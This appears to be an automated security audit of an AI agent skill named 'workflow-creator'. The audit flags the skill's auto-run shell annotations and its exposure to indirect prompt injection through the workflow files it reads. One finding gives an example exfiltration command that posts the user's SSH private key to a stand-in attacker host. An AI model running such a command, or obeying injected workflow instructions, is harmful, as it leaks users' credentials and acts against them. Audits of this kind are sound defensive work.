workflow-creator
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill implements a 'turbo' and 'turbo-all' annotation system designed to automatically execute shell commands found in markdown files.
  - Evidence: SKILL.md defines `// turbo` and `// turbo-all` to 'Auto-run the next step' or 'ALL steps'.
  - Evidence: Templates in `references/workflow-templates.md` include commands like `npm run deploy`, `rm -rf`, and `git push`, which can have significant side effects if modified or misused.
- [PROMPT_INJECTION] (HIGH): The skill is highly susceptible to indirect prompt injection (Category 8). It reads, processes, and writes markdown files that contain executable instructions.
  - Ingestion points: The skill reads files from `.agent/workflows/` and takes user input to generate new ones (SKILL.md).
  - Boundary markers: None identified in the provided files to distinguish between safe instructions and potentially malicious injected commands.
  - Capability inventory: The skill explicitly has the capability to execute shell commands (via the turbo annotations) and write files to the local filesystem.
  - Sanitization: No evidence of sanitization or validation of the commands being written to or read from the workflow files.
- [DATA_EXFILTRATION] (MEDIUM): While no explicit exfiltration code is present, the ability to execute arbitrary shell commands via the turbo feature allows for trivial data exfiltration (e.g., `curl -d @~/.ssh/id_rsa attacker.com`).
Recommendations
- AI detected serious security threats
Audit Metadata